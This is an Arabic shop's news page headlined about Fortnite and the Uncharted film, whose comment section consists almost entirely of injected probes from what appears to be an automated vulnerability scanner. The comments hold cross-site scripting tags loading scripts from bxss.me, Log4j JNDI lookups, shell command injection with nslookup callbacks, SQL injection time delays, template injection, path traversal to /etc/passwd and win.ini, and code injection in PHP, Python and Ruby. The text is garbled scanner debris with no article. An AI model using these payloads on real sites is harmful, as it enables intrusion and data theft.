ے
بحث
KWD
العربية
Shopping cart Close

لا يوجد منتجات فى سلة التسوق

Back to all

فورتنايت تحتفل باقتراب إطلاق فيلم Uncharted على طريقتها

13 شباط 2022

التعليقات
اترك تعليقا Close
Mr.

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-211645&h=58-cafd8-2&"></script>

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitwlzumrdnxle98da${::-.}bxss.me}zzzz

Mr.

response.write(9666464*9232561)

Mr.

1Cy5t26LDrO

Mr.

'+response.write(9666464*9232561)+'

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitlywfcqfhkbc8637${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

"+response.write(9666464*9232561)+"

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-211649.58.cafd8${::-.}1${::-.}bxss.me}}

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

echo ghgicl$()\ cylwws\nz^xyu||a #' &echo ghgicl$()\ cylwws\nz^xyu||a #|" &echo ghgicl$()\ cylwws\nz^xyu||a #

Mr.

&echo gjpobk$()\ zuqmps\nz^xyu||a #' &echo gjpobk$()\ zuqmps\nz^xyu||a #|" &echo gjpobk$()\ zuqmps\nz^xyu||a #

Mr.

|echo nxceyc$()\ viifza\nz^xyu||a #' |echo nxceyc$()\ viifza\nz^xyu||a #|" |echo nxceyc$()\ viifza\nz^xyu||a #

Mr.

(nslookup hitohhwzuogvz1cb29.bxss.me||perl -e "gethostbyname('hitohhwzuogvz1cb29.bxss.me')")

Mr.

6crPlVgM

Mr.

$(nslookup hitwbkoqckdwe7c722.bxss.me||perl -e "gethostbyname('hitwbkoqckdwe7c722.bxss.me')")

Mr.

&(nslookup hityfthlgccslf5463.bxss.me||perl -e "gethostbyname('hityfthlgccslf5463.bxss.me')")&'\"`0&(nslookup hityfthlgccslf5463.bxss.me||perl -e "gethostbyname('hityfthlgccslf5463.bxss.me')")&`'

Mr.

|(nslookup hitmwzhoyzjed8811f.bxss.me||perl -e "gethostbyname('hitmwzhoyzjed8811f.bxss.me')")

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

bcc:074625.58-211652.58.cafd8.19244.2@bxss.me

Mr.

`(nslookup hitrwizxkzulj64958.bxss.me||perl -e "gethostbyname('hitrwizxkzulj64958.bxss.me')")`

Mr.

file:///etc/passwd

Mr.

to@example.com>
bcc:074625.58-211653.58.cafd8.19244.2@bxss.me

Mr.

../

Mr.

;(nslookup hitbgjzzdnxgh9251d.bxss.me||perl -e "gethostbyname('hitbgjzzdnxgh9251d.bxss.me')")|(nslookup hitbgjzzdnxgh9251d.bxss.me||perl -e "gethostbyname('hitbgjzzdnxgh9251d.bxss.me')")&(nslookup hitbgjzzdnxgh9251d.bxss.me||perl -e "gethostbyname('hitbgjzzdnxgh9251d.bxss.me')")

Mr.

./

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

${9999269+9999095}

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

&n984288=v952251

Mr.

Http://bxss.me/t/fit.txt

Mr.

)

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

!(()&&!|*|*|

Mr.

/etc/shells

Mr.

c:/windows/win.ini

Mr.

^(#$!@#$)(()))******

Mr.

bxss.me

Mr.

'.gethostbyname(lc('hitxk'.'ctmsitst91edb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(73).chr(118).chr(73).'

Mr.

'"()

Mr.

".gethostbyname(lc("hitpy"."irpraqol56217.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(76).chr(114).chr(83)."

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

';print(md5(31337));$a='

Mr.

'&&sleep(27*1000)*hmacat&&'

Mr.

";print(md5(31337));$a="

Mr.

"&&sleep(27*1000)*hpeucz&&"

Mr.

${@print(md5(31337))}

Mr.

'||sleep(27*1000)*rgysml||'

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

Mr.

"||sleep(27*1000)*spnxja||"

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjmmneqwntxa444c.'+'bxss.me')

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitjmmneqwntxa444c."+"bxss.me")+'

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjmmneqwntxa444c.'+'bxss.me')+"

Mr.

bxss.me/t/xss.html?%00

Mr.

-1 OR 2+637-637-1=0+0+0+1 --

Mr.

-1 OR 3+637-637-1=0+0+0+1 --

Mr.

-1 OR 2+433-433-1=0+0+0+1

Mr.

-1 OR 3+433-433-1=0+0+0+1

Mr.

-1' OR 2+67-67-1=0+0+0+1 --

Mr.

"+"A".concat(70-3).concat(22*4).concat(114).concat(89).concat(114).concat(67)+(require"socket"
Socket.gethostbyname("hitub"+"nohugkrad5bae.bxss.me.")[3].to_s)+"

Mr.

-1' OR 3+67-67-1=0+0+0+1 --

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7

Mr.

-1' OR 2+908-908-1=0+0+0+1 or 'JrFqzfB3'='

Mr.

'+'A'.concat(70-3).concat(22*4).concat(119).concat(67).concat(104).concat(83)+(require'socket'
Socket.gethostbyname('hittb'+'cubxkqni8f65f.bxss.me.')[3].to_s)+'

Mr.

-1' OR 3+908-908-1=0+0+0+1 or 'JrFqzfB3'='

Mr.

http://hitokvrkszkex.bxss.me/

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

-1" OR 2+467-467-1=0+0+0+1 --

Mr.

/xfs.bxss.me

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7/.

Mr.

-1" OR 3+467-467-1=0+0+0+1 --

Mr.

'"

Mr.

<!--

Mr.

'"()&%<zzz><ScRiPt >ZziX(9173)</ScRiPt>

Mr.

'"()&%<zzz><ScRiPt >ZziX(9392)</ScRiPt>

Mr.

9214945

Mr.

bfg7640<s1﹥s2ʺs3ʹhjl7640

Mr.

bfgx8422%C0%BEz1%C0%BCz2a%90bcxhjl8422

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<th:t="${dfb}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

<ScRiPt >ZziX(9632)</ScRiPt>

Mr.

<WTDVJP>NPDDB[!+!]</WTDVJP>

Mr.

<script>ZziX(9068)</script>

Mr.

<ScR<ScRiPt>IpT>ZziX(9350)</sCr<ScRiPt>IpT>

Mr.

<ScRiPt
>ZziX(9139)</ScRiPt>

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9005></ScRiPt>

Mr.

<isindex type=image src=1 onerror=ZziX(9333)>

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9942'>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

<body onload=ZziX(9555)>

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=ZziX(9179)>

Mr.

<img src=xyz OnErRor=ZziX(9944)>

Mr.

<img/src=">" onerror=alert(9191)>

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%5A%7A%69%58%289360%29%3C%2F%73%43%72%69%70%54%3E

Mr.

\u003CScRiPt\ZziX(9921)\u003C/sCripT\u003E

Mr.

&lt;ScRiPt&gt;ZziX(9274)&lt;/sCripT&gt;

Mr.

%F6<img zzz onmouseover=ZziX(91791) //%F6>

Mr.

<input autofocus onfocus=ZziX(9620)>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

}body{zzz:Expre/**/SSion(ZziX(9393))}

Mr.

mNfMQ
<ScRiPt >ZziX(9674)</ScRiPt>

Mr.

<WEMOQR>LLK0B[!+!]</WEMOQR>

Mr.

<ifRAme sRc=9799.com></IfRamE>

Mr.

<aLcK2t3 x=9312>

Mr.

<img sRc='http://attacker-9430/log.php?

Mr.

<adfAXpX<

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

-1; waitfor delay '0:0:15' --

Mr.

-1); waitfor delay '0:0:15' --

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

Mr.

ATGSN8jg'; waitfor delay '0:0:15' --

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-212559&h=58-cafd8-2&"></script>

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitzbjlauvbmp32182${::-.}bxss.me}zzzz

Mr.

response.write(9866574*9444377)

Mr.'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-212560&h=58-cafd8-2&"></script>

&#xD;&#xA;

Mr.

'+response.write(9866574*9444377)+'

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitxroojaqkjx08d80${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

"+response.write(9866574*9444377)+"

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

&#xD;&#xA;

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-212562.58.cafd8${::-.}1${::-.}bxss.me}}

response.write(9752440*9470711)

&#xD;&#xA;

Mr.

echo ymfbvv$()\ tdhcgo\nz^xyu||a #' &echo ymfbvv$()\ tdhcgo\nz^xyu||a #|" &echo ymfbvv$()\ tdhcgo\nz^xyu||a #

/../../../../../../../../../../windows/system32/BITSADMIN.exe

&#xD;&#xA;

Mr.

SO5d6bRd

${j${::-n}di:dns${::-:}${::-/}/hitxmvjiguqcuef373${::-.}bxss.me}zzzz

&#xD;&#xA;

Mr.

../../../../../../../../../../../../../../etc/passwd

'+response.write(9752440*9470711)+'

&#xD;&#xA;

sCUcItB0

&#xD;&#xA;

Mr.

&echo rrjqgq$()\ gkdnlj\nz^xyu||a #' &echo rrjqgq$()\ gkdnlj\nz^xyu||a #|" &echo rrjqgq$()\ gkdnlj\nz^xyu||a #

"+response.write(9752440*9470711)+"

&#xD;&#xA;

Mr.

|echo hirseo$()\ fpydsj\nz^xyu||a #' |echo hirseo$()\ fpydsj\nz^xyu||a #|" |echo hirseo$()\ fpydsj\nz^xyu||a #

Mr.

(nslookup hitqslwuagkxj19b39.bxss.me||perl -e "gethostbyname('hitqslwuagkxj19b39.bxss.me')")

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

BitIjBOg'); waitfor delay '0:0:15' --

Mr.

file:///etc/passwd

Mr.

$(nslookup hitaomlqysnhsf1d05.bxss.me||perl -e "gethostbyname('hitaomlqysnhsf1d05.bxss.me')")

Mr.

&#xD;&#xA;

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-212565.58.cafd8${::-.}1${::-.}bxss.me}}

&#xD;&#xA;

Mr.

to@example.com>
bcc:074625.58-212566.58.cafd8.19244.2@bxss.me

Mr.

&(nslookup hittacdikznbp404fd.bxss.me||perl -e "gethostbyname('hittacdikznbp404fd.bxss.me')")&'\"`0&(nslookup hittacdikznbp404fd.bxss.me||perl -e "gethostbyname('hittacdikznbp404fd.bxss.me')")&`'

Mr.

../
&#xD;&#xA;

Mr. bcc:074625.58-212567.58.cafd8.19244.2@bxss.me

&#xD;&#xA;

../../../../../../../../../../../../../../etc/passwd

&#xD;&#xA;

Mr.

|(nslookup hitkcmlbqwvie61ac6.bxss.me||perl -e "gethostbyname('hitkcmlbqwvie61ac6.bxss.me')")

to@example.com> bcc:074625.58-212568.58.cafd8.19244.2@bxss.me

&#xD;&#xA;

../../../../../../../../../../../../../../windows/win.ini

&#xD;&#xA;

Mr.

`(nslookup hitejuexxtmtg2721b.bxss.me||perl -e "gethostbyname('hitejuexxtmtg2721b.bxss.me')")`

Mr.

;(nslookup hitttnswzpoakf9516.bxss.me||perl -e "gethostbyname('hitttnswzpoakf9516.bxss.me')")|(nslookup hitttnswzpoakf9516.bxss.me||perl -e "gethostbyname('hitttnswzpoakf9516.bxss.me')")&(nslookup hitttnswzpoakf9516.bxss.me||perl -e "gethostbyname('hitttnswzpoakf9516.bxss.me')")

file:///etc/passwd

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

echo vukkln$()\ cmyuzx\nz^xyu||a #' &echo vukkln$()\ cmyuzx\nz^xyu||a #|" &echo vukkln$()\ cmyuzx\nz^xyu||a #

&#xD;&#xA;

../Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;<esi:include src="http://bxss.me/rpb.png"/>

Mr.<esi:include src="http://bxss.me/rpb.png"/>

&#xD;&#xA;

&echo lhcrbp$()\ bcqmqt\nz^xyu||a #' &echo lhcrbp$()\ bcqmqt\nz^xyu||a #|" &echo lhcrbp$()\ bcqmqt\nz^xyu||a #

&#xD;&#xA;

|echo viqbuw$()\ mayopu\nz^xyu||a #' |echo viqbuw$()\ mayopu\nz^xyu||a #|" |echo viqbuw$()\ mayopu\nz^xyu||a #

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

${10000231+9999977}

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

(nslookup hitsfdcqhgoafebe25.bxss.me||perl -e "gethostbyname('hitsfdcqhgoafebe25.bxss.me')")

&#xD;&#xA;

${9999043+10000190}

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

Http://bxss.me/t/fit.txt

$(nslookup hitqxjzvjthkv8bc51.bxss.me||perl -e "gethostbyname('hitqxjzvjthkv8bc51.bxss.me')")

&#xD;&#xA;

Mr.

http://bxss.me/t/fit.txt?.jpg

&(nslookup hitwyyxoeibtna4826.bxss.me||perl -e "gethostbyname('hitwyyxoeibtna4826.bxss.me')")&'\"`0&(nslookup hitwyyxoeibtna4826.bxss.me||perl -e "gethostbyname('hitwyyxoeibtna4826.bxss.me')")&`'

&#xD;&#xA;

Mr.

/etc/shells

Mr.

&#xD;&#xA;&n984121=v973176

Mr.

c:/windows/win.ini

|(nslookup hitjuniqldmlm7368a.bxss.me||perl -e "gethostbyname('hitjuniqldmlm7368a.bxss.me')")

&#xD;&#xA;

Mr.

bxss.me

Mr.

)

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.

&#xD;&#xA;

`(nslookup hitawuuodbqoofd8d3.bxss.me||perl -e "gethostbyname('hitawuuodbqoofd8d3.bxss.me')")`

&#xD;&#xA;

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

Http://bxss.me/t/fit.txt

&#xD;&#xA;

Mr.&n917619=v935024

&#xD;&#xA;

)

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

http://bxss.me/t/fit.txt?.

&#xD;&#xA;

!(()&&!|*|*|

&#xD;&#xA;

Mr.

'.gethostbyname(lc('hitws'.'slnvzzjsf7bc2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(66).chr(102).chr(66).'

/etc/shells

&#xD;&#xA;

Mr.

'"()

^(#$!@#$)(()))******

&#xD;&#xA;

Mr.

".gethostbyname(lc("hitmy"."zpxtkofm86fb9.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(65).chr(98).chr(86)."

Mr.

&#xD;&#xA;

c:/windows/win.ini

&#xD;&#xA;

'.gethostbyname(lc('hitpg'.'rsnuzsod7cde5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(70).chr(119).chr(71).'

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

bxss.me

&#xD;&#xA;

Mr.

&#xD;&#xA;'&&sleep(27*1000)*btoniu&&'

".gethostbyname(lc("hithi"."ubiuwjrv83b76.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(82).chr(108).chr(66)."

&#xD;&#xA;

Mr.

&#xD;&#xA;"&&sleep(27*1000)*ojomuv&&"

Mr.

&#xD;&#xA;'||sleep(27*1000)*vioyhg||'

Mr.

&#xD;&#xA;"||sleep(27*1000)*gmvbrk||"

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

';print(md5(31337));$a='

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

";print(md5(31337));$a="

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitlibtbrsyvrfdb98.'+'bxss.me')

Mr.

${@print(md5(31337))}

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitlibtbrsyvrfdb98."+"bxss.me")+'

Mr.

${@print(md5(31337))}\

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitlibtbrsyvrfdb98.'+'bxss.me')+"

'"()

&#xD;&#xA;

Mr.

'.print(md5(31337)).'

Mr.

&#xD;&#xA;

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwukixcisjsba765.'+'bxss.me')

&#xD;&#xA;

Mr.

HttP://bxss.me/t/xss.html?%00

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitwukixcisjsba765."+"bxss.me")+'

&#xD;&#xA;

Mr.

bxss.me/t/xss.html?%00

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

&#xD;&#xA;

Mr.

cfp2GQu1')); waitfor delay '0:0:15' --

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwukixcisjsba765.'+'bxss.me')+"

&#xD;&#xA;

HttP://bxss.me/t/xss.html?%00

&#xD;&#xA;

Mr.'&&sleep(27*1000)*lhnlee&&'

&#xD;&#xA;

Mr.

"+"A".concat(70-3).concat(22*4).concat(98).concat(70).concat(120).concat(80)+(require"socket"
Socket.gethostbyname("hitmz"+"pqhacwlu77d58.bxss.me.")[3].to_s)+"

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7

bxss.me/t/xss.html?%00

&#xD;&#xA;

';print(md5(31337));$a='

&#xD;&#xA;

Mr."&&sleep(27*1000)*hzfrxg&&"

&#xD;&#xA;

Mr.

'+'A'.concat(70-3).concat(22*4).concat(103).concat(80).concat(114).concat(85)+(require'socket'
Socket.gethostbyname('hitwk'+'fpmtmwqfc0be9.bxss.me.')[3].to_s)+'

";print(md5(31337));$a="

&#xD;&#xA;

Mr.'||sleep(27*1000)*kglsld||'

&#xD;&#xA;

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7/.

${@print(md5(31337))}

&#xD;&#xA;

Mr."||sleep(27*1000)*bngsuw||"

&#xD;&#xA;

"+"A".concat(70-3).concat(22*4).concat(119).concat(76).concat(97).concat(86)+(require"socket" Socket.gethostbyname("hitnd"+"gcdadhuv12dcc.bxss.me.")[3].to_s)+"

&#xD;&#xA;

${@print(md5(31337))}\

&#xD;&#xA;

'+'A'.concat(70-3).concat(22*4).concat(121).concat(89).concat(119).concat(65)+(require'socket' Socket.gethostbyname('hitjs'+'atvapczw509b8.bxss.me.')[3].to_s)+'

&#xD;&#xA;

'.print(md5(31337)).'

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

http://hitftegqlyamg.bxss.me/

http://hitasdfyndxsv.bxss.me/

&#xD;&#xA;

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&#xD;&#xA;

Mr.

/xfs.bxss.me

Mr.

'"

/xfs.bxss.me

&#xD;&#xA;

Mr.

&#xD;&#xA;'"()&%<zzz><ScRiPt >jKTQ(9857)</ScRiPt>

Mr.

<!--

Mr.

&#xD;&#xA;

'"

&#xD;&#xA;

Mr.

'"()&%<zzz><ScRiPt >GWum(9326)</ScRiPt>

<!--

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

'"()&%<zzz><ScRiPt >jKTQ(9139)</ScRiPt>

Mr.

&#xD;&#xA;

Mr.

-1 OR 2+849-849-1=0+0+0+1 --

Mr.

&#xD;&#xA;

Mr.

-1 OR 2+883-883-1=0+0+0+1

Mr.

'"()&%<zzz><ScRiPt >GWum(9827)</ScRiPt>

Mr.

-1' OR 2+452-452-1=0+0+0+1 --

Mr.

&#xD;&#xA;9874906

Mr.

&#xD;&#xA;

Mr.

-1' OR 2+29-29-1=0+0+0+1 or 'MbluuxlT'='

Mr.

&#xD;&#xA;

Mr.

-1" OR 2+574-574-1=0+0+0+1 --

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

9183340

Mr.

bfg7996<s1﹥s2ʺs3ʹhjl7996

Mr.

&#xD;&#xA;

Mr.

-5 OR 436=(SELECT 436 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;

Mr.

bfgx5625%C0%BEz1%C0%BCz2a%90bcxhjl5625

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<th:t="${dfb}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

&#xD;&#xA;<ScRiPt >jKTQ(9833)</ScRiPt>

Mr.

-5) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;<WWO2OW>A661T[!+!]</WWO2OW>

Mr.

&#xD;&#xA;<ScRiPt
>jKTQ(9977)</ScRiPt>

Mr.

&#xD;&#xA;<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9647></ScRiPt>

Mr.

&#xD;&#xA;<isindex type=image src=1 onerror=jKTQ(9982)>

Mr.

&#xD;&#xA;<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9594'>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

&#xD;&#xA;<body onload=jKTQ(9714)>

Mr.

&#xD;&#xA;<img src=//xss.bxss.me/t/dot.gif onload=jKTQ(9406)>

Mr.

-1)) OR 291=(SELECT 291 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;<img src=xyz OnErRor=jKTQ(9677)>

Mr.

&#xD;&#xA;<img/src=">" onerror=alert(9615)>

Mr.

%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%6A%4B%54%51%289792%29%3C%2F%73%43%72%69%70%54%3E

Mr.

&#xD;&#xA;&lt;ScRiPt&gt;jKTQ(9333)&lt;/sCripT&gt;

Mr.

%F6<img zzz onmouseover=jKTQ(93381) //%F6>

Mr.

&#xD;&#xA;<input autofocus onfocus=jKTQ(9984)>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

&#xD;&#xA;}body{zzz:Expre/**/SSion(jKTQ(9336))}

Mr.

&#xD;&#xA;nwTtw
<ScRiPt >jKTQ(9137)</ScRiPt>

Mr.

&#xD;&#xA;<WQUEMO>F66WX[!+!]</WQUEMO>

Mr.

OGIgPFBz' OR 938=(SELECT 938 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;<ifRAme sRc=9607.com></IfRamE>

Mr.

&#xD;&#xA;<a1THMnA x=9994>

Mr.

&#xD;&#xA;<img sRc='http://attacker-9771/log.php?

Mr.

&#xD;&#xA;<ayvf4pS<

Mr.'"()&%<zzz><ScRiPt >jKTQ(9903)</ScRiPt>

&#xD;&#xA;

'"()&%<zzz><ScRiPt >jKTQ(9860)</ScRiPt>

&#xD;&#xA;

Mr.9125598

&#xD;&#xA;

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

bfg7698<s1﹥s2ʺs3ʹhjl7698

&#xD;&#xA;

bfgx3817%C0%BEz1%C0%BCz2a%90bcxhjl3817

&#xD;&#xA;

<%={{={@{#{${dfb}}%>

&#xD;&#xA;

<th:t="${dfb}#foreach

&#xD;&#xA;

Mr.

mmFOwn3D') OR 307=(SELECT 307 FROM PG_SLEEP(15))--

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

&#xD;&#xA;

dfb{{98991*97996}}xca

&#xD;&#xA;

dfb[[${98991*97996}]]xca

&#xD;&#xA;

dfb__${98991*97996}__::.x

&#xD;&#xA;

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

&#xD;&#xA;

Mr.<ScRiPt >jKTQ(9430)</ScRiPt>

&#xD;&#xA;

Mr.<WJTMT2>KRM3Y[!+!]</WJTMT2>

&#xD;&#xA;

Mr.<script>jKTQ(9748)</script>

&#xD;&#xA;

Mr.

1 waitfor delay '0:0:15' --

Mr.<ScR<ScRiPt>IpT>jKTQ(9631)</sCr<ScRiPt>IpT>

&#xD;&#xA;

Mr.<ScRiPt >jKTQ(9925)</ScRiPt>

&#xD;&#xA;

Mr.

3b9Wgid2')) OR 541=(SELECT 541 FROM PG_SLEEP(15))--

Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9016></ScRiPt>

&#xD;&#xA;

Mr.<isindex type=image src=1 onerror=jKTQ(9073)>

&#xD;&#xA;

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9054'>

&#xD;&#xA;

Mr.<body onload=jKTQ(9426)>

&#xD;&#xA;

Mr.<img src=//xss.bxss.me/t/dot.gif onload=jKTQ(9680)>

&#xD;&#xA;

Mr.<img src=xyz OnErRor=jKTQ(9984)>

&#xD;&#xA;

Mr.<img/src=">" onerror=alert(9946)>

&#xD;&#xA;

Mr.

UGpNzISe'; waitfor delay '0:0:15' --

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%6A%4B%54%51%289544%29%3C%2F%73%43%72%69%70%54%3E

&#xD;&#xA;

Mr.\u003CScRiPt\jKTQ(9679)\u003C/sCripT\u003E

&#xD;&#xA;

Mr.&lt;ScRiPt&gt;jKTQ(9687)&lt;/sCripT&gt;

&#xD;&#xA;

Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

%F6<img zzz onmouseover=jKTQ(99471) //%F6>

&#xD;&#xA;

Mr.<input autofocus onfocus=jKTQ(9962)>

&#xD;&#xA;

<a HrEF=http://xss.bxss.me></a>

&#xD;&#xA;

<a HrEF=jaVaScRiPT:>

&#xD;&#xA;

Mr.}body{zzz:Expre/**/SSion(jKTQ(9711))}

